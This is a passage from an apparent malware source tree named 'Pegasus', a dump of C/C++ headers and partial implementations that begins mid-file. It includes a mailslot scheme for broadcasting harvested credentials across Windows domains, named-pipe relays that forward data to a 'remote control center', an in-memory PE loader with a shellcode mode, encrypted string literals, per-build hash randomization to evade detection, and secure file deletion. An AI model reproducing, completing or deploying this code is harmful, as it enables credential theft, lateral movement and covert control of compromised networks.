CRSTRW("\\\\", "\x00\x20\xdc\x0d\x02\x20\xe0\x39\xd8\xa4\xd2"); 46 | lstrcat(wszResBuff, wszS); 47 | lstrcat(wszResBuff, g_wszLocalMachineName); 48 | my_free(wszS); 49 | 50 | // calc hash 51 | i64Res = HashStringW_const(wszResBuff); 52 | DbgPrint("formatted local machine name [%ws], hash %08X%08X", wszResBuff, (DWORD)(i64Res << 32), (DWORD)i64Res); 53 | my_free(wszResBuff); 54 | 55 | } while (FALSE); // not a loop 56 | 57 | 58 | return i64Res; 59 | } -------------------------------------------------------------------------------- /Pegasus/inc/HashDeriveFuncs.h: -------------------------------------------------------------------------------- 1 | /* 2 | HashDeriveFuncs.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | UINT64 i64CalcTargetMachineHash(LPWSTR wszTargetMachineName); -------------------------------------------------------------------------------- /Pegasus/inc/HashedStrings.h: -------------------------------------------------------------------------------- 1 | /* 2 | HashedStrings.h 3 | Misc routines and macro definition for hashed string usage 4 | ROUTINES_BY_PTR supported 5 | NB: uses per-build unique HASHSTR_RND_XOR value, take care when using compiled (not by reference) versions 6 | between different projects! 7 | 8 | NB: assumed to be used via source-code parser, which recalculates values of: 9 | 10 | HASHSTR(, 0x0BADF00D) - hash pseudo-macro 11 | STRHASH_ALGID(n) - which algo (possibly bitfields) is used in this build 12 | STRHASH_PARAM(n) - algo's param to be used for extra randomness 13 | 14 | */ 15 | 16 | #pragma once 17 | 18 | #include 19 | 20 | // define per-build hash randomization 21 | // NB: take care about passing hashes between differently compiled modules, to prevent problems 22 | // this value is changed on each build 23 | #define HASHSTR_RND_XOR STRHASH_PARAM(0x16ca75882606765a) 24 | 25 | // define hash pseudo macros 26 | // NB: these are without = sign, so parser should not touch them 27 | #define HASHSTR(original_string, i64Hash) i64Hash ^ HASHSTR_RND_XOR 28 | #define HASHSTR_CONST(original_string, i64Hash) i64Hash 29 | #define STRHASH_ALGID(alg_id) alg_id 30 | #define STRHASH_PARAM(alg_param) alg_param 31 | 32 | // define functions for import-export, used in both compilation modes 33 | typedef struct _HashedStrings_ptrs { 34 | 35 | // WORD wFunctionCount; // to distinct between different versions 36 | 37 | UINT64(*fnHashStringA)(LPCSTR szStringToHash); 38 | UINT64(*fnHashStringW)(LPCWSTR wszStringToHash); 39 | UINT64(*fnHashStringA_const)(LPCSTR szStringToHash); 40 | UINT64(*fnHashStringW_const)(LPCWSTR wszStringToHash); 41 | UINT64(*fnHashBin)(LPVOID pBin, DWORD dwBinLen); 42 | UINT64(*fnHashBin_const)(LPVOID pBin, DWORD dwBinLen); 43 | 44 | } HashedStrings_ptrs, *PHashedStrings_ptrs; 45 | 46 | #ifdef ROUTINES_BY_PTR 47 | 48 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 49 | 50 | // global var definition to be visible by all modules which use this one 51 | extern HashedStrings_ptrs HashedStrings_apis; 52 | 53 | // transparent code replacements 54 | #define HashStringA HashedStrings_apis.fnHashStringA 55 | #define HashStringW HashedStrings_apis.fnHashStringW 56 | #define HashStringA_const HashedStrings_apis.fnHashStringA_const 57 | #define HashStringW_const HashedStrings_apis.fnHashStringW_const 58 | #define HashBin HashedStrings_apis.fnHashBin 59 | #define HashBin_const HashedStrings_apis.fnHashBin_const 60 | 61 | VOID HashedStrings_resolve(HashedStrings_ptrs *apis); 62 | 63 | #else 64 | 65 | // declarations - compile as code 66 | UINT64 HashStringA(LPCSTR szStringToHash); 67 | UINT64 HashStringW(LPCWSTR wszStringToHash); 68 | UINT64 HashStringA_const(LPCSTR szStringToHash); 69 | UINT64 HashStringW_const(LPCWSTR wszStringToHash); 70 | UINT64 HashBin(LPVOID pBin, DWORD dwBinLen); 71 | UINT64 HashBin_const(LPVOID pBin, DWORD dwBinLen); 72 | 73 | VOID HashedStrings_imports(HashedStrings_ptrs *apis); 74 | 75 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/LZ4/bench.h: -------------------------------------------------------------------------------- 1 | /* 2 | bench.h - Demo program to benchmark open-source compression algorithm 3 | Copyright (C) Yann Collet 2012 4 | 5 | This program is free software; you can redistribute it and/or modify 6 | it under the terms of the GNU General Public License as published by 7 | the Free Software Foundation; either version 2 of the License, or 8 | (at your option) any later version. 9 | 10 | This program is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | GNU General Public License for more details. 14 | 15 | You should have received a copy of the GNU General Public License along 16 | with this program; if not, write to the Free Software Foundation, Inc., 17 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 18 | 19 | You can contact the author at : 20 | - LZ4 homepage : http://fastcompression.blogspot.com/p/lz4.html 21 | - LZ4 source repository : http://code.google.com/p/lz4/ 22 | */ 23 | #pragma once 24 | 25 | #if defined (__cplusplus) 26 | extern "C" { 27 | #endif 28 | 29 | 30 | int BMK_benchFile(char** fileNamesTable, int nbFiles, int cLevel); 31 | 32 | // Parameters 33 | void BMK_SetBlocksize(int bsize); 34 | void BMK_SetNbIterations(int nbLoops); 35 | 36 | 37 | 38 | #if defined (__cplusplus) 39 | } 40 | #endif 41 | -------------------------------------------------------------------------------- /Pegasus/inc/LocalStorage.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | LocalStorage.cpp 3 | Routines for storing some information chunks locally, to be processed later 4 | */ 5 | 6 | #include 7 | 8 | #include "mem.h" 9 | #include "dbg.h" 10 | #include "CryptoStrings.h" 11 | #include "RandomGen.h" 12 | 13 | #include "LocalStorage.h" 14 | 15 | 16 | /* 17 | Performs initialization of persistent local storage 18 | */ 19 | VOID lsInitLocalStorage() 20 | { 21 | DbgPrint("entered"); 22 | 23 | } -------------------------------------------------------------------------------- /Pegasus/inc/LocalStorage.h: -------------------------------------------------------------------------------- 1 | /* 2 | LocalStorage.h 3 | */ 4 | 5 | #include 6 | 7 | typedef enum StorageItemSourceEnum { 8 | SI_ERROR = 0, // not defined source, assumed to be an error 9 | SI_FROM_REMOTE_CONTROL_CENTER, // data got from remote controller server, to be sent to some machine inside of network (if node is acting as proxy for others) 10 | SI_FOR_REMOTE_CONTROL_CENTER, // data to be uploaded to remote machine 11 | 12 | SI_MAXVALUE = 255 // max value to fit BYTE in serialized version of structure 13 | }; 14 | 15 | 16 | // describe item from a local storage in a memory linked list 17 | typedef struct _LOCAL_STORAGE_ITEM 18 | { 19 | StorageItemSourceEnum siSource; // type of source which created this item 20 | DWORD dwItemUniqId; 21 | 22 | LPVOID pData; // encoded and/or packed data 23 | SIZE_T lDataLen; // len of data in ^ 24 | 25 | } LOCAL_STORAGE_ITEM, *PLOCAL_STORAGE_ITEM; 26 | 27 | 28 | VOID lsInitLocalStorage(); -------------------------------------------------------------------------------- /Pegasus/inc/MailslotWorks.h: -------------------------------------------------------------------------------- 1 | /* 2 | MailslotWorks.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | #include "DataCallbackManager.h" 8 | 9 | #define MAILSLOT_MSG_BUFFER_SIZE 1024 10 | 11 | // MAILSLOT_MESSAGE_ENVELOPE.bMessageId, specified in header 12 | typedef enum ENUM_MAILSLOT_MESSAGE_ID { 13 | MMI_NONE = 0, // nothing defined 14 | MMI_CREDENTIALS, // CredManager.cpp use to broadcast it's auth creds 15 | MMI_NETWORK_ENABLED_SEARCH, // NetworkConnectivity.cpp, issue this to search for network-enabled machines 16 | MMI_NETWORK_ENABLED_ANSWER, // -//-, every machine with remote network working answers with this code and self name appended in pData 17 | 18 | MMI_MAXVAL = MAXBYTE // max value to fit into byte 19 | }; 20 | 21 | // params passed to callback function from mwSendMailslotMessageToAllDomains() 22 | typedef struct _MW_CALLBACK_PARAMS { 23 | LPVOID pData; // data buffer to be broadcasted, <400 bytes recommended 24 | DWORD dwDataLen; // len of data in ^ to be sent 25 | BYTE bMailslotMessageId; // id of message to be sent, set in header 26 | 27 | DWORD dwMessagesSent; // amount of successfully sent messages (used by func to determine if any domain was enumed) 28 | 29 | } MW_CALLBACK_PARAMS, *PMW_CALLBACK_PARAMS; 30 | 31 | // for mwInitMailslotServer() to pass params to server thread 32 | typedef struct _MW_INITSERVER_PARAMS { 33 | 34 | CLIENTDISPATCHERFUNC cdCallback; // callback to be issued on each data received 35 | HANDLE hSlot; // server mailslot handle to wait forever on 36 | 37 | } MW_INITSERVER_PARAMS, *PMW_INITSERVER_PARAMS; 38 | 39 | 40 | 41 | // define functions for import-export, used in both compilation modes 42 | typedef struct _MailslotWorks_ptrs { 43 | 44 | VOID (*fnmwInitMailslotServer)(CLIENTDISPATCHERFUNC cdCallback); 45 | 46 | BOOL(*fnmwSendMailslotMessageToDomain)(LPVOID pBuffer, DWORD dwMessageLen, LPWSTR wszTargetDomain, BYTE bMailslotMessageId); 47 | BOOL(*fnmwSendMailslotMessageToMainDomain)(LPVOID pBuffer, DWORD dwMessageLen, BYTE bMailslotMessageId); 48 | BOOL(*fnmwSendMailslotMessageToAllDomains)(LPVOID pBuffer, DWORD dwMessageLen, BYTE bMailslotMessageId); 49 | 50 | } MailslotWorks_ptrs, *PMailslotWorks_ptrs; 51 | 52 | 53 | #ifdef ROUTINES_BY_PTR 54 | 55 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 56 | 57 | // global var definition to be visible by all modules which use this one 58 | extern MailslotWorks_ptrs MailslotWorks_apis; 59 | 60 | // transparent code replacements 61 | #define mwInitMailslotServer MailslotWorks_apis.fnmwInitMailslotServer 62 | #define mwSendMailslotMessageToDomain MailslotWorks_apis.fnmwSendMailslotMessageToDomain 63 | #define mwSendMailslotMessageToMainDomain MailslotWorks_apis.fnmwSendMailslotMessageToMainDomain 64 | #define mwSendMailslotMessageToAllDomains MailslotWorks_apis.fnmwSendMailslotMessageToAllDomains 65 | 66 | VOID MailslotWorks_resolve(MailslotWorks_ptrs *apis); 67 | 68 | #else 69 | 70 | VOID mwInitMailslotServer(CLIENTDISPATCHERFUNC cdCallback); 71 | BOOL mwSendMailslotMessageToDomain(LPVOID pBuffer, DWORD dwMessageLen, LPWSTR wszTargetDomain, BYTE bMailslotMessageId); 72 | BOOL mwSendMailslotMessageToMainDomain(LPVOID pBuffer, DWORD dwMessageLen, BYTE bMailslotMessageId); 73 | BOOL mwSendMailslotMessageToAllDomains(LPVOID pBuffer, DWORD dwMessageLen, BYTE bMailslotMessageId); 74 | 75 | VOID MailslotWorks_imports(MailslotWorks_ptrs *apis); 76 | 77 | 78 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/MyStreams.h: -------------------------------------------------------------------------------- 1 | /* 2 | MyStreams.h 3 | Headers file 4 | */ 5 | 6 | #include 7 | #pragma once 8 | 9 | // initial size of buffer 10 | #define MY_STREAM_INIT_SIZE 102400 11 | 12 | // pseudo-stream definition 13 | typedef struct _MY_STREAM MY_STREAM; 14 | typedef struct _MY_STREAM { 15 | 16 | LPVOID pData; // data buffer ptr 17 | SIZE_T lDataLen; // amount of data currently in buffer 18 | SIZE_T lMaxBufferLen; // max amount of data currently able to fit in buffer 19 | 20 | // exported methods 21 | VOID (*msFreeStream) (MY_STREAM *pStream); 22 | VOID (*msWriteStream) (MY_STREAM *pStream, LPVOID pData, SIZE_T lDataLen); 23 | SIZE_T (*msReadStream) (MY_STREAM *pStream, LPVOID pReadBuffer, SIZE_T lReadBufferLen); 24 | 25 | } MY_STREAM, *PMY_STREAM; 26 | 27 | #ifdef __cplusplus 28 | extern "C" { 29 | #endif 30 | 31 | // apis 32 | BOOL msInitStream_(MY_STREAM *pStream); 33 | 34 | #ifdef _DEBUG 35 | BOOL msInitStream_dbg(LPSTR szCaller, MY_STREAM *pStream); 36 | #endif 37 | 38 | //VOID msFreeStream(MY_STREAM *pStream); 39 | //VOID msWriteStream(MY_STREAM *pStream, LPVOID pData, SIZE_T lDataLen); 40 | //SIZE_T msReadStream(MY_STREAM *pStream, LPVOID pReadBuffer, SIZE_T lReadBufferLen); 41 | 42 | #ifdef __cplusplus 43 | } 44 | #endif 45 | 46 | #ifndef _DEBUG 47 | #define msInitStream msInitStream_ 48 | #else 49 | #define msInitStream(ms) msInitStream_dbg(__FUNCTION__"@"QUOTE(__LINE__), ms) 50 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/MyStringRoutines.h: -------------------------------------------------------------------------------- 1 | /* 2 | MyStringRoutines.h 3 | Headers file 4 | 5 | */ 6 | #pragma once 7 | 8 | #include 9 | #include "RandomGen.h" 10 | 11 | 12 | // define functions for import-export, used in both compilation modes 13 | typedef struct _MyStringRoutines_ptrs { 14 | 15 | DWORD (*fnsr_replacechar)(LPWSTR wszString, WCHAR wCharToFind, WCHAR wCharToSet); 16 | VOID(*fnsr_replacelastchar)(LPWSTR wszString, WCHAR wCharToFind, WCHAR wCharToSet); 17 | VOID(*fnsr_genRandomChars)(WORD wStringLenMin, WORD wStringLenMax, WCHAR *wszOutbuffer); 18 | VOID(*fnsr_genRandomCharsRG)(RndClass *rg, WORD wStringLenMin, WORD wStringLenMax, LPWSTR wszOutbuffer); 19 | VOID(*fnsr_genRandomCharsRG_h)(RndClass *rg, WORD wStringLenMin, WORD wStringLenMax, LPWSTR wszOutbuffer); 20 | LPWSTR(*fnsr_findlastchar)(LPWSTR wszString, WCHAR wCharToFind); 21 | VOID(*fnsr_lowercase)(LPWSTR wszString); 22 | 23 | } MyStringRoutines_ptrs, *PMyStringRoutines_ptrs; 24 | 25 | 26 | 27 | 28 | #ifdef ROUTINES_BY_PTR 29 | 30 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 31 | 32 | // global var definition to be visible by all modules which use this one 33 | extern MyStringRoutines_ptrs MyStringRoutines_apis; 34 | 35 | // transparent code replacements 36 | #define sr_replacechar MyStringRoutines_apis.fnsr_replacechar 37 | #define sr_replacelastchar MyStringRoutines_apis.fnsr_replacelastchar 38 | #define sr_genRandomChars MyStringRoutines_apis.fnsr_genRandomChars 39 | #define sr_genRandomCharsRG MyStringRoutines_apis.fnsr_genRandomCharsRG 40 | #define sr_genRandomCharsRG_h MyStringRoutines_apis.fnsr_genRandomCharsRG_h 41 | #define sr_findlastchar MyStringRoutines_apis.fnsr_findlastchar 42 | #define sr_lowercase MyStringRoutines_apis.fnsr_lowercase 43 | 44 | 45 | VOID MyStringRoutines_resolve(MyStringRoutines_ptrs *apis); 46 | 47 | #else 48 | 49 | 50 | 51 | 52 | #ifdef __cpluplus 53 | extern "C" { 54 | #endif 55 | 56 | DWORD sr_replacechar(LPWSTR wszString, WCHAR wCharToFind, WCHAR wCharToSet); 57 | VOID sr_replacelastchar(LPWSTR wszString, WCHAR wCharToFind, WCHAR wCharToSet); 58 | VOID sr_genRandomChars(WORD wStringLenMin, WORD wStringLenMax, WCHAR *wszOutbuffer); 59 | VOID sr_genRandomCharsRG(RndClass *rg, WORD wStringLenMin, WORD wStringLenMax, LPWSTR wszOutbuffer); 60 | VOID sr_genRandomCharsRG_h(RndClass *rg, WORD wStringLenMin, WORD wStringLenMax, LPWSTR wszOutbuffer); 61 | LPWSTR sr_findlastchar(LPWSTR wszString, WCHAR wCharToFind); 62 | VOID sr_lowercase(LPWSTR wszString); 63 | 64 | VOID MyStringRoutines_imports(MyStringRoutines_ptrs *apis); 65 | 66 | #ifdef __cpluplus 67 | } 68 | #endif 69 | 70 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/NetMessageEnvelope.h: -------------------------------------------------------------------------------- 1 | /* 2 | NetMessageEnvelope.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | #pragma pack(push) 11 | #pragma pack(1) 12 | // special structure to envelope all network messages into 13 | typedef struct _NET_MESSAGE_ENVELOPE { 14 | 15 | DWORD dwRandomKey; // some random value to encode all other fields 16 | 17 | // --- hash is calculated starting from here --- 18 | BYTE bMessageHash[20]; // sha hash of all chunk except first dword with rnd encoding value 19 | 20 | // params to identify a message 21 | BYTE bMessageId; // id of message appended 22 | 23 | } NET_MESSAGE_ENVELOPE, *PNET_MESSAGE_ENVELOPE; 24 | #pragma pack(pop) 25 | 26 | VOID nmeMakeEnvelope(LPVOID pBuffer, DWORD dwBufferLen, BYTE bMessageId, LPVOID *pEnveloped, DWORD *dwEnvelopedLen); 27 | BOOL nmeCheckRemoveEnvelope(LPVOID pBuffer, DWORD *dwBufferLen, BYTE *bMessageId); -------------------------------------------------------------------------------- /Pegasus/inc/PELoader.h: -------------------------------------------------------------------------------- 1 | /* 2 | PELoader.h 3 | Headers file 4 | 5 | */ 6 | 7 | #pragma once 8 | 9 | #include 10 | 11 | #define PeSupGetImagePeHeader(Image) (PIMAGE_NT_HEADERS *)(##Image+*(DWORD *)(##Image+0x3C)); 12 | 13 | #define PeSupGetOptionalField(PeHeader, Field) \ 14 | (FIELD_OFFSET(IMAGE_OPTIONAL_HEADER32, ##Field) != FIELD_OFFSET(IMAGE_OPTIONAL_HEADER64, ##Field) && \ 15 | ((PIMAGE_NT_HEADERS32)PeHeader)->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64 ? \ 16 | ((PIMAGE_NT_HEADERS64)PeHeader)->OptionalHeader.##Field : \ 17 | ((PIMAGE_NT_HEADERS32)PeHeader)->OptionalHeader.##Field) 18 | 19 | #define PeSupGetDirectoryEntryPtr(PeHeader, Entry) \ 20 | (((PIMAGE_NT_HEADERS32)PeHeader)->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64 ? \ 21 | &((PIMAGE_NT_HEADERS64)PeHeader)->OptionalHeader.DataDirectory[##Entry] : \ 22 | &((PIMAGE_NT_HEADERS32)PeHeader)->OptionalHeader.DataDirectory[##Entry]) 23 | 24 | #define PeSupGetOptionalField(PeHeader, Field) \ 25 | (FIELD_OFFSET(IMAGE_OPTIONAL_HEADER32, ##Field) != FIELD_OFFSET(IMAGE_OPTIONAL_HEADER64, ##Field) && \ 26 | ((PIMAGE_NT_HEADERS32)PeHeader)->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64 ? \ 27 | ((PIMAGE_NT_HEADERS64)PeHeader)->OptionalHeader.##Field : \ 28 | ((PIMAGE_NT_HEADERS32)PeHeader)->OptionalHeader.##Field) 29 | 30 | #ifndef IMAGE_SIZEOF_BASE_RELOCATION 31 | #define IMAGE_SIZEOF_BASE_RELOCATION 8 32 | #endif 33 | 34 | #define IMAGE_REL_BASED_SHIFT 12 35 | #define IMAGE_REL_BASED_MASK 0xFFF 36 | 37 | typedef struct _IMAGE_BASE_RELOCATION_EX { 38 | DWORD VirtualAddress; 39 | DWORD SizeOfBlock; 40 | WORD TypeOffset[1]; 41 | } IMAGE_BASE_RELOCATION_EX; 42 | typedef IMAGE_BASE_RELOCATION_EX UNALIGNED * PIMAGE_BASE_RELOCATION_EX; 43 | 44 | #define RVATOVA( base, offset )(((SIZE_T)(base) + (SIZE_T)(offset))) 45 | 46 | 47 | typedef int (_stdcall *EntryPoint)(HANDLE, DWORD, LPVOID); 48 | 49 | 50 | 51 | 52 | 53 | #ifndef SHELLCODE_MODE 54 | // usual style 55 | BOOL PELoad(LPVOID pPE, LPVOID *pImage, SIZE_T *lImageSize, LPVOID *pEntryPoint ); 56 | 57 | 58 | #else 59 | 60 | // apis to be passed by shellcode startup code 61 | typedef struct _SHELLCODE_APIS 62 | { 63 | BYTE bSize; // verification field 64 | 65 | // apis from kernel32.dll 66 | LPVOID (WINAPI *p_VirtualAlloc) (LPVOID pAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 67 | BOOL (WINAPI *p_VirtualFree) (LPVOID pAddress, SIZE_T dwSize, DWORD dwFreeType); 68 | FARPROC (WINAPI *p_GetProcAddress) (HMODULE hModule, LPCSTR lpProcName); 69 | HMODULE (WINAPI *p_LoadLibraryA) (LPCSTR lpFileName); 70 | VOID (WINAPI *p_ExitProcess) (UINT uExitCode); 71 | VOID (WINAPI *p_Sleep) (DWORD dwMilliseconds); 72 | 73 | // dbg-only 74 | //VOID(WINAPI *p_OutputDebugStringA)(LPCSTR szDbgString); 75 | 76 | } SHELLCODE_APIS, *PSHELLCODE_APIS; 77 | 78 | 79 | // shellcode style 80 | BOOL PELoad(SHELLCODE_APIS *pAPIs, LPVOID pPE, LPVOID *pImage, SIZE_T *lImageSize, LPVOID *pEntryPoint ); 81 | 82 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/PipeWorks.h: -------------------------------------------------------------------------------- 1 | /* 2 | PipeWorks.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | 8 | #include "DataCallbackManager.h" 9 | 10 | #ifdef ROUTINES_BY_PTR 11 | #ifndef NO_TRANSPORT_ENVELOPE 12 | #define ROUTINES_BY_PTR_ALLOWED 13 | #endif 14 | #endif 15 | 16 | // less than 10k to allow connectionless remote send 17 | #define PIPE_BUFFER_SIZE 4096 18 | 19 | // NET_MESSAGE_ENVELOPE.bMessageId, specified in header 20 | typedef enum ENUM_PIPE_MESSAGE_ID { 21 | PMI_NONE = 0, // nothing defined 22 | PMI_SEND_QUERY, // issued when remote client needs to send some data chunk to network control center. Server should return id to check that query status later via PMI_CHECK_STATUS_QUERY 23 | PMI_CHECK_STATUS_QUERY, // after PMI_SEND_QUERY, client may periodically poll server to detect send status of a chunk 24 | 25 | PMI_TERMINATE_HOST_PROCESS___, // used by wdd to terminate other hosts with pipe running, to replace with a new version // DEPRECATED, not used from now 26 | PMI_TERMINATE_HOST_PROCESS_IF_LOWER_VERSION, // replacement for PMI_TERMINATE_HOST_PROCESS, which checks version of caller and target, so a lower version will be terminated (to prevent downgrades) 27 | 28 | PMI_MAXVAL = MAXBYTE // max value to fit into byte 29 | }; 30 | 31 | // define functions for import-export, used in both compilation modes 32 | typedef struct _PipeWorks_ptrs { 33 | 34 | DWORD (WINAPI *fnpwInitPipeServer)(LPVOID pParameter); 35 | void (*fnpwInitPipeServerAsync)(CLIENTDISPATCHERFUNC cdCallback); 36 | BOOL(*fnpwIsRemotePipeWorkingTimeout)(LPWSTR wszTargetMachineName, DWORD dwTimeoutMsec, DWORD dwRecheckIntervalMsec); 37 | BOOL(*fn_pwRemotePipeCheckSend)(LPWSTR wszTargetMachineName, DWORD dwTimeoutMsec, DWORD dwRecheckIntervalMsec, LPVOID pSendBuffer, DWORD lSendBufferLen, LPVOID *pAnswer, DWORD *pdwAnswerLen, BYTE *pbPipeMessageId); 38 | 39 | } PipeWorks_ptrs, *PPipeWorks_ptrs; 40 | 41 | // params sent to dispatcher thread 42 | typedef struct _DISPATCHER_THREAD_PARAMS { 43 | 44 | HANDLE hPipe; // pipe with client connected 45 | CRITICAL_SECTION *csDispatcherCall; // cs to guard calls to dispatcher proc to avoid mt problems 46 | CLIENTDISPATCHERFUNC cdCallback; // function to be called for ready combined data buffer 47 | 48 | } DISPATCHER_THREAD_PARAMS, *PDISPATCHER_THREAD_PARAMS; 49 | 50 | #ifdef ROUTINES_BY_PTR_ALLOWED 51 | 52 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 53 | 54 | // global var definition to be visible by all modules which use this one 55 | extern PipeWorks_ptrs PipeWorks_apis; 56 | 57 | // transparent code replacements 58 | #define pwInitPipeServer PipeWorks_apis.fnpwInitPipeServer 59 | #define pwInitPipeServerAsync PipeWorks_apis.fnpwInitPipeServerAsync 60 | #define pwIsRemotePipeWorkingTimeout PipeWorks_apis.fnpwIsRemotePipeWorkingTimeout 61 | #define _pwRemotePipeCheckSend PipeWorks_apis.fn_pwRemotePipeCheckSend 62 | 63 | VOID PipeWorks_resolve(PipeWorks_ptrs *apis); 64 | 65 | #else 66 | 67 | DWORD WINAPI pwInitPipeServer(LPVOID pParameter); 68 | void pwInitPipeServerAsync(CLIENTDISPATCHERFUNC cdCallback); 69 | BOOL pwIsRemotePipeWorkingTimeout(LPWSTR wszTargetMachineName, DWORD dwTimeoutMsec, DWORD dwRecheckIntervalMsec); 70 | BOOL _pwRemotePipeCheckSend(LPWSTR wszTargetMachineName, DWORD dwTimeoutMsec, DWORD dwRecheckIntervalMsec, LPVOID pSendBuffer, DWORD lSendBufferLen, LPVOID *pAnswer, DWORD *pdwAnswerLen, BYTE *pbPipeMessageId); 71 | 72 | VOID PipeWorks_imports(PipeWorks_ptrs *apis); 73 | 74 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/RandomGen.h: -------------------------------------------------------------------------------- 1 | /* 2 | RandomGen.h 3 | Headers file 4 | 5 | */ 6 | 7 | #pragma once 8 | 9 | #define MAKE_UINT64(high, low) (UINT64)( ((UINT64)high << 32 ) | (DWORD)low ) 10 | 11 | // declarate struc with no definition, to allow self-links in method 12 | typedef struct _RndClass RndClass; 13 | 14 | // define the pseudo-class struct 15 | typedef struct _RndClass 16 | { 17 | // internal seed values 18 | SIZE_T lStrucLen; // used as a flag meaning initialization is already done 19 | DWORD m_w; 20 | DWORD m_z; 21 | 22 | // exported methods 23 | VOID(*rgInitSeed) (RndClass *rg, UINT64 i64Seed); 24 | VOID (*rgInitSeedFromTime) (RndClass *rg); 25 | DWORD (*rgGetRndDWORD) (RndClass *rg); 26 | DWORD (*rgGetRnd) (RndClass *rg, DWORD dwMin, DWORD dwMax); 27 | 28 | } RndClass, *PRndClass; 29 | 30 | 31 | // define functions for import-export, used in both compilation modes 32 | typedef struct _RndClass_ptrs { 33 | 34 | BOOL (*fnrgNew)(RndClass *rg); // this is sufficient, all other functions are exported internally 35 | 36 | } RndClass_ptrs, *PRndClass_ptrs; 37 | 38 | 39 | 40 | 41 | #ifdef ROUTINES_BY_PTR 42 | 43 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 44 | 45 | // global var definition to be visible by all modules which use this one 46 | #ifdef __cplusplus 47 | extern "C" RndClass_ptrs RndClass_apis; 48 | #else 49 | extern RndClass_ptrs RndClass_apis; 50 | #endif 51 | 52 | // transparent code replacements 53 | #define rgNew RndClass_apis.fnrgNew 54 | 55 | 56 | VOID RndClass_resolve(RndClass_ptrs *apis); 57 | 58 | #else 59 | 60 | 61 | 62 | #ifdef __cplusplus 63 | extern "C" { 64 | #endif 65 | 66 | // RndClass struc constructor 67 | // fill all the values of passed struct 68 | // NB: re-init safe, no rg rewrite in case func finds struct to be already initialized 69 | // returns TRUE in case values were written, signalizing to caller need to perform additional init steps, like rgInitSeedFromTime 70 | BOOL rgNew(RndClass *rg); 71 | 72 | // init seeds with passed values 73 | // if seeds are 0, the default values are left 74 | VOID rgInitSeed(RndClass *rg, UINT64 i64Seed); 75 | 76 | // internally inits rnd seeds from system time/tickcount values 77 | // may be disabled or rewritten for ring0 code 78 | VOID rgInitSeedFromTime(RndClass *rg); 79 | 80 | // The heart of the generator 81 | // It uses George Marsaglia's MWC algorithm to produce an unsigned integer 82 | DWORD rgGetRndDWORD(RndClass *rg); 83 | 84 | // returns random number in range [dwMin, dwMax] 85 | DWORD rgGetRnd(RndClass *rg, DWORD dwMin, DWORD dwMax); 86 | 87 | VOID RndClass_imports(RndClass_ptrs *apis); 88 | 89 | #ifdef __cplusplus 90 | } 91 | #endif 92 | 93 | 94 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/RegFuncs.h: -------------------------------------------------------------------------------- 1 | /* 2 | RegFuncs.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | LSTATUS RegCreatePath(HKEY hRootKey, LPCWSTR wszRegPath); 11 | BOOL RegWriteDWORD(LPCWSTR wszRegPath, LPCWSTR wszKeyName, DWORD dwValueToSet); 12 | BOOL RegRemoveValue(HKEY hRootKey, LPCWSTR wszRegPath, LPCWSTR wszRegKeyname); 13 | BOOL RegRemoveKey(HKEY hRootKey, LPCWSTR wszRegPath); -------------------------------------------------------------------------------- /Pegasus/inc/SecureClean.h: -------------------------------------------------------------------------------- 1 | /* 2 | SecureClean.h 3 | Headers 4 | */ 5 | 6 | #include 7 | 8 | 9 | BOOL scSecureDeleteFile(LPWSTR wszFilename); -------------------------------------------------------------------------------- /Pegasus/inc/WOW64Detect.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | WOW64Detect.cpp 3 | Routines to detect x64 OS while running from x32 (or x64) binary 4 | 5 | */ 6 | 7 | #include 8 | 9 | #include "dbg.h" 10 | #include "mem.h" 11 | #include "CryptoStrings.h" 12 | 13 | 14 | #include "WOW64Detect.h" 15 | 16 | 17 | /* 18 | Check if we are running on x64 OS 19 | http://msdn.microsoft.com/en-us/library/windows/desktop/ms684139%28v=vs.85%29.aspx 20 | */ 21 | BOOL IsX64Windows() 22 | { 23 | #if defined(_M_X64) 24 | // in case of x64 targer, just return TRUE, essential for server request 25 | return TRUE; 26 | #elif defined(_M_IX86) 27 | BOOL bRes = FALSE; // func res 28 | LPWSTR wszS; 29 | LPSTR szS; 30 | LPFN_ISWOW64PROCESS fnIsWow64Process; 31 | HMODULE hKernel32; 32 | 33 | __try { 34 | 35 | // get kernel32 handle 36 | wszS = CRSTRW("kernel32", "\xff\x1f\x19\x0c\xf7\x1f\x12\x01\xfd\x09\xfc\xe8\x5c\xb5\x60"); 37 | hKernel32 = GetModuleHandle(wszS); 38 | my_free(wszS); 39 | if (hKernel32) { 40 | 41 | // query IsWow64Process api 42 | szS = CRSTRA("IsWow64Process", "\xff\xbf\x47\x0c\xf1\xbf\x6e\x17\xd8\xa8\xb0\xb2\x5b\x77\x95\xcb\x2c\x62\xf4\xb7\x10\x41\x13"); 43 | fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(hKernel32, szS); 44 | my_free(szS); 45 | if (NULL != fnIsWow64Process) { 46 | 47 | if (!fnIsWow64Process(GetCurrentProcess(),&bRes)) { 48 | // handle error 49 | DbgPrint("WARN: fnIsWow64Process returned failure"); 50 | bRes = FALSE; 51 | } 52 | } // fnIsWow64Process 